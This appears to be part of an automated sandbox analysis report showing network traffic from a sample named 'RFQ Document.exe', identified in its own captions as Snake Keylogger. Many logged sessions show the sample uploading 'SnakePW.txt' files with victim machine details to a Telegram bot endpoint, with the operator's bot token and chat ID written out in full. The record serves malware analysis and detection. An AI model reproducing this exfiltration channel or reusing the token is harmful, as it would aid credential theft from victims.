                                            Data Ascii: {"ok":true,"result":{"message_id":12843,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808780,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            256192.168.2.450089149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:40 UTC407OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f1425682
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:40 UTC407OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 31 34 32 35 36 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f1425682Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:40 UTC408INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:40 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:40 UTC408INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12844,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808780,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            257192.168.2.450091149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:40 UTC409OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f1615788
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:40 UTC409OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 31 36 31 35 37 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f1615788Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:40 UTC409INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:40 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:40 UTC410INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12845,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808780,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            258192.168.2.450093149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:40 UTC410OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f180548b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:40 UTC411OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 31 38 30 35 34 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f180548bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:40 UTC411INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:40 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:40 UTC411INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12846,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808780,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            259192.168.2.450094149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:40 UTC412OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f195cb65
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:40 UTC412OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 31 39 35 63 62 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f195cb65Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:41 UTC413INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:41 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:41 UTC413INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12847,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808780,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            26192.168.2.449800149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:25 UTC41OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c500bbdf
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:25 UTC41OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 30 30 62 62 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c500bbdfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:26 UTC42INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:26 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:26 UTC42INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12606,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808706,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            260192.168.2.450097149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:41 UTC413OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f1c577ff
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:41 UTC414OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 31 63 35 37 37 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f1c577ffContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:41 UTC414INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:41 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:41 UTC415INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12848,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808781,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            261192.168.2.450098149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:41 UTC415OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f1e21602
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:41 UTC415OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 31 65 32 31 36 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f1e21602Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:41 UTC416INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:41 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:41 UTC416INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12849,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808781,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            262192.168.2.450099149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:41 UTC417OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f20113e6
                                            Host: api.telegram.org
                                            Content-Length: 407
